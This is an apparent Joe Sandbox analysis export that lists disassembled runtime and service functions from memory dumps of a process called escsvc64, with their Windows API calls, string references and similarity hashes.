Function 0000000180004AB4 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 460COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000000180004B11

Part of subcall function 0000000180006E74: __GetUnwindTryBlock.LIBCMT ref: 0000000180006EB7
Part of subcall function 0000000180006E74: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000000180006EDC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000000180004BE9
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000000180004E37
std::bad_alloc::bad_alloc.LIBCMT ref: 0000000180004F44

Strings

csm, xrefs: 0000000180004C0C
csm, xrefs: 0000000180004B92
csm, xrefs: 0000000180004B2B

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 1c07f995c180fe8b19482931ca148fc83acb38a6c0a0277f61a86655f9e973e5
Instruction ID: 44985bc39f6ce64ecd6a895ba7cc64a1c60f2cc549d2f9bd7a277b4e1fad8b73
Opcode Fuzzy Hash: 1c07f995c180fe8b19482931ca148fc83acb38a6c0a0277f61a86655f9e973e5
Instruction Fuzzy Hash: 3EF1A171518A4C8FEB96EF68C4457E977E0FB58354F10825AF449C7292CF30EA89C786

Function 0000000140005E60 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E7A
GetModuleHandleA.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E98
GetModuleHandleA.KERNEL32 ref: 0000000140005EC5
GetProcAddress.KERNEL32 ref: 0000000140005F18

Strings

KERNEL32.DLL, xrefs: 0000000140005E91
EncodePointer, xrefs: 0000000140005F0E
.mixcrt, xrefs: 0000000140005EF0

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: HandleModule$AddressProcValue
String ID: .mixcrt$EncodePointer$KERNEL32.DLL
API String ID: 2623865758-1746336069
Opcode ID: d62cb1fb803a255d5fbbc31f8e13c3154414141dc766df3b9e4d7561da73de53
Instruction ID: 1ea2a93b65aa6fed410ffae4d9ca497f9c51e7e72b60b0055214cc82254390db
Opcode Fuzzy Hash: d62cb1fb803a255d5fbbc31f8e13c3154414141dc766df3b9e4d7561da73de53
Instruction Fuzzy Hash: 1B216D71611A9182EB9ADB12F8443AA62A1FB8DB95F481025FB8A476B4EF3DC545C700

Function 0000000140005F50 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F70
GetModuleHandleA.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F8B
GetModuleHandleA.KERNEL32 ref: 0000000140005FB2
GetProcAddress.KERNEL32 ref: 0000000140005FF8

Strings

KERNEL32.DLL, xrefs: 0000000140005F84
DecodePointer, xrefs: 0000000140005FEE
.mixcrt, xrefs: 0000000140005FD0

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: HandleModule$AddressProcValue
String ID: .mixcrt$DecodePointer$KERNEL32.DLL
API String ID: 2623865758-2532145718
Opcode ID: e7bb03dee73054b957bffa576d04ca91cbd153297632be51d16cdfd1f33b3ed2
Instruction ID: 94de048c25dcc42fbbcb3b1deb800ddb01b49c7b4c0577e3be6c58809a988402
Opcode Fuzzy Hash: e7bb03dee73054b957bffa576d04ca91cbd153297632be51d16cdfd1f33b3ed2
Instruction Fuzzy Hash: B0215B71300A5185EA56DF27B8843BA62A1FB4DBD5F980025FB4A472B0EF7DC845C710

Function 0000000140005D90 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DB0
GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DCB
GetModuleHandleA.KERNEL32 ref: 0000000140005DF2
GetProcAddress.KERNEL32 ref: 0000000140005E38

Strings

KERNEL32.DLL, xrefs: 0000000140005DC4
EncodePointer, xrefs: 0000000140005E2E
.mixcrt, xrefs: 0000000140005E10

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: HandleModule$AddressProcValue
String ID: .mixcrt$EncodePointer$KERNEL32.DLL
API String ID: 2623865758-1746336069
Opcode ID: d0f9a6bdab863bdcd73823ff862c5cac17ebee37e048433f7763a5d36b9a2943
Instruction ID: 10474dd8a00d39f69b81620e6a70c0b6e39ead194dd7be9fc042b9424ac9d22a
Opcode Fuzzy Hash: d0f9a6bdab863bdcd73823ff862c5cac17ebee37e048433f7763a5d36b9a2943
Instruction Fuzzy Hash: 4A216F71300A9195EA6AEF17F8443AA22A1FB4DBD2F580425FB89472B4EF79C545C700

Function 01FD1F00 Relevance: 12.3, APIs: 8, Instructions: 297COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 01FD1F28
__scrt_acquire_startup_lock.LIBCMT ref: 01FD1F7A
_RTC_Initialize.LIBCMT ref: 01FD1FA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 01FD1FCE
__scrt_release_startup_lock.LIBCMT ref: 01FD1FF9

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
Instruction ID: 64ccbc9682b108e7ac4425b6754d6711f9fe8a3329eb34c059d875bd641ca9e2
Opcode Fuzzy Hash: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
Instruction Fuzzy Hash: 9C811631B18A068FE719AB7C9C4477937E3EBA9200F4C825AE549C3255DB7BC846C7C2

Function 0000000180001FD8 Relevance: 12.3, APIs: 8, Instructions: 297COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000000180002000
__scrt_acquire_startup_lock.LIBCMT ref: 0000000180002052
_RTC_Initialize.LIBCMT ref: 0000000180002080
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000001800020A6
__scrt_release_startup_lock.LIBCMT ref: 00000001800020D1

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
Instruction ID: dc10c060f0ea74d2d5e1af32f94848e2a2faa396c4ff80201887d7c9b88c4984
Opcode Fuzzy Hash: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
Instruction Fuzzy Hash: 6A919130618A0D8FF7DAEB6C98457E932D1EB5D380F44C16AB549C3297DE74CA4D8782

Function 000000014000E000 Relevance: 10.7, APIs: 7, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E05A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E079
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E11F
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E179
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E1B2
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E1EF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E22E

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 4108598835e914e00f326557e6f51ea859514b5d8428b88a1ae53d3209862e4c
Instruction ID: 062fe5d0a4023e3a9fcdfe48f18c9f478e5edbb0d365d0ef86478d7369592790
Opcode Fuzzy Hash: 4108598835e914e00f326557e6f51ea859514b5d8428b88a1ae53d3209862e4c
Instruction Fuzzy Hash: 0261A0B2304BC08AE762DF23B9447DA66A5F74C7E8F444225BF6967BE4DB74C5518300

Function 01FD4EAC Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 461COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 01FD504A
std::bad_alloc::bad_alloc.LIBCMT ref: 01FD5373

Strings

csm, xrefs: 01FD5071
csm, xrefs: 01FD4FF3
csm, xrefs: 01FD4F91

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 68eb516bf9c9cba3fb8227e73063fcca90c7209ae9946ac81e4a150aacf18831
Instruction ID: 6192ec68f05fb8a20d3a5b57d956443e0c50e6b05887c3ffcbd6537717fe2604
Opcode Fuzzy Hash: 68eb516bf9c9cba3fb8227e73063fcca90c7209ae9946ac81e4a150aacf18831
Instruction Fuzzy Hash: 4EE1F731918B4A8FDB15EF2CC8856B9BBF2FB55314F18465DD485C7262DB31E482CB82

Function 0000000180004F84 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 461COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000000180005122
std::bad_alloc::bad_alloc.LIBCMT ref: 000000018000544B

Strings

csm, xrefs: 00000001800050CB
csm, xrefs: 0000000180005149
csm, xrefs: 0000000180005069

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 78ca78e43d1c9a3decdd43792cedac3c6e57d46113737bad297a5d37f2058efb
Instruction ID: a904dc7235edeb2451198f4cfbddd28e7b82c3b5ee9ce0e1ec7a6e0abe0cff3a
Opcode Fuzzy Hash: 78ca78e43d1c9a3decdd43792cedac3c6e57d46113737bad297a5d37f2058efb
Instruction Fuzzy Hash: 26F1B331518B4C8BEB96EF28C4817EA77E0FB59345F10865DF48587293DF30A689CB82

Function 000000014000E2A0 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E307
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E31D
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E34B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E3B9
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E46C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E531

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: b59b65d0f1a67b05c39a7111098eaa7419e1de460175b2d3e7c8c0e7f43f5c31
Instruction ID: 168a81da63108cd0b97bed4d09b5aeb46f306b31fbc8593ad063c360c0888773
Opcode Fuzzy Hash: b59b65d0f1a67b05c39a7111098eaa7419e1de460175b2d3e7c8c0e7f43f5c31
Instruction Fuzzy Hash: E181CEB2300A8086EB62DF23A9847E967A5F74CBE8F504615FB69677F4EB78C5058700

Function 000000014000AA50 Relevance: 9.2, APIs: 6, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AAA8
GetLastError.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AABE

Part of subcall function 0000000140003790: HeapAlloc.KERNEL32(?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 00000001400037F1

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AB4E
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000ABF5
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AC0C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AC6B

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 1d7edb17a92f29ba27a9ddb9769f6531d5c5bb9e027f7567b246d935c0cd8161
Instruction ID: 95f027ec94f94ab459c81f74e7744455635649906aa6b246b78c286b6d19a74f
Opcode Fuzzy Hash: 1d7edb17a92f29ba27a9ddb9769f6531d5c5bb9e027f7567b246d935c0cd8161
Instruction Fuzzy Hash: FC617AB23006408AEB66DF26A844BD937E5F74EBE8F480215FB594B7E5DB79C841C340

Function 0000000140006DE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00001000,00000001400037E5,?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 0000000140006DEF
GetProcAddress.KERNEL32(?,?,00001000,00000001400037E5,?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 0000000140006E04
ExitProcess.KERNEL32 ref: 0000000140006E15

Strings

mscoree.dll, xrefs: 0000000140006DE8
CorExitProcess, xrefs: 0000000140006DFA

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 83038e842e64aeba14171e32d07205d5f8d0562140aa5abcf553098547ecfbf7
Instruction ID: 55edfa6310dd0622b2002cc7331f8db003e515954a46d7483bd0e06cf4709e31
Opcode Fuzzy Hash: 83038e842e64aeba14171e32d07205d5f8d0562140aa5abcf553098547ecfbf7
Instruction Fuzzy Hash: 1CE0EC70311B1151FF5B9B62E8943A512666B4D780F081429BA5A4B3B0EEBD840C9300

Function 01FD42AC Relevance: 7.9, APIs: 5, Instructions: 439COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 01FD43CF
__AdjustPointer.LIBCMT ref: 01FD441A

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 85524f391991ec340317f264c6d2d5d97c9bca659d756e659cf024a3c4dd6266
Instruction ID: 12a6e53fe827f79e781b804684b2049eab27c7a25fb711e0bf00a7639d03c4d5
Opcode Fuzzy Hash: 85524f391991ec340317f264c6d2d5d97c9bca659d756e659cf024a3c4dd6266
Instruction Fuzzy Hash: E0C12631918F0BCFEB29EF2CC454275B7D2FB95710B5C466EC98AC3A55EA32D8818781

Function 0000000180004384 Relevance: 7.9, APIs: 5, Instructions: 439COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00000001800044A7
__AdjustPointer.LIBCMT ref: 00000001800044F2

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 6fadff9372363955ae653530a4e92bab46242c9f9ad5856ddd2d2fb6fafb04b9
Instruction ID: 86d43945fb91ae2073277537c466f3923ab9ccee3ff6691bb59e917e620bf1bf
Opcode Fuzzy Hash: 6fadff9372363955ae653530a4e92bab46242c9f9ad5856ddd2d2fb6fafb04b9
Instruction Fuzzy Hash: 92D10572118E0E8FEBEBDB5884413F572D0FB9D391F54C56DB48ACB186EE20DA498385

Function 0000000140008440 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140008466

Part of subcall function 0000000140008A40: Sleep.KERNEL32(?,?,?,00000001400061E3,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140008A90

GetFileType.KERNEL32 ref: 000000014000860C

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: cba840f5acbdaf61da99ed994bd72b21301df9ac7cfb0dfc9d6f44c4c51fbe36
Instruction ID: 9ec098995d62ce09c4685074e2e5a57aa7930796f03975d98b598ac7bf0dcf8a
Opcode Fuzzy Hash: cba840f5acbdaf61da99ed994bd72b21301df9ac7cfb0dfc9d6f44c4c51fbe36
Instruction Fuzzy Hash: 0B91ADB2604B8085EB72CB26E8487993A95F7197B4F254325EFB9473F1EB7AC841C701

Function 0000000140001300 Relevance: 7.6, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

SetServiceStatus.ADVAPI32 ref: 000000014000137A
SetEvent.KERNEL32 ref: 000000014000138C
SetServiceStatus.ADVAPI32 ref: 00000001400013E5
SetServiceStatus.ADVAPI32 ref: 0000000140001437
SetEvent.KERNEL32 ref: 0000000140001449

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ServiceStatus$Event
String ID:
API String ID: 3225596143-0
Opcode ID: d33ebfa21478c44a2b4229f9ec37f48baa9755fe043f6f9d422456950182cdc3
Instruction ID: 267da8374e0204dd645fd918fc07667eae96e170f0cb4894acbc5a21a37544f2
Opcode Fuzzy Hash: d33ebfa21478c44a2b4229f9ec37f48baa9755fe043f6f9d422456950182cdc3
Instruction Fuzzy Hash: 4741B2B49016408BFB67CF6BF880BD47AB4B79C3D8F04811AEA4D8B670DB7A85448B04

Function 0000000140008320 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,000000014000348B), ref: 000000014000832E
GetLastError.KERNEL32(?,?,?,?,?,?,000000014000348B), ref: 000000014000834E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,000000014000348B), ref: 000000014000838B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,000000014000348B), ref: 00000001400083AB

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: e08104ef58c5b7a0e93a651a31a02ccca22a156db734b767f670521c42133e35
Instruction ID: dbc5816ed4fa3de7f18b23a09a72020ca8908b93386790fa4ffafd35d39d8284
Opcode Fuzzy Hash: e08104ef58c5b7a0e93a651a31a02ccca22a156db734b767f670521c42133e35
Instruction Fuzzy Hash: 06315E71615A5082E7628F12B84478A67E0F78DBD0F540125FF898BBB8DB7DC5428B00

Function 000000014000D630 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400091E0), ref: 000000014000D68C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400091E0), ref: 000000014000D6A7

Part of subcall function 000000014000E880: CreateFileA.KERNEL32 ref: 000000014000E8AA

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400091E0), ref: 000000014000D6BC
WideCharToMultiByte.KERNEL32 ref: 000000014000D6ED
WriteConsoleA.KERNEL32 ref: 000000014000D712

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 1212426c9a6d3a13bc232f4aa453472932cbfef3c4738367fd966b73ce934767
Instruction ID: d3d35c4d5cd4b0ecb72ff258d36a5aae06955c4e2a1dc75f7bddf35bfaf35452
Opcode Fuzzy Hash: 1212426c9a6d3a13bc232f4aa453472932cbfef3c4738367fd966b73ce934767
Instruction Fuzzy Hash: 78311C71604A4182EB12DB22F85539673A0F78D7B4F500316FBAD4BAF4DBBAC585CB10

Function 0000000140006240 Relevance: 7.5, APIs: 5, Instructions: 41threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0000000140003B5E), ref: 000000014000624A
FlsGetValue.KERNEL32(?,?,?,0000000140003B5E), ref: 0000000140006258
SetLastError.KERNEL32(?,?,?,0000000140003B5E), ref: 00000001400062B3

Part of subcall function 0000000140008A40: Sleep.KERNEL32(?,?,?,00000001400061E3,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140008A90

FlsSetValue.KERNEL32(?,?,?,0000000140003B5E), ref: 0000000140006284

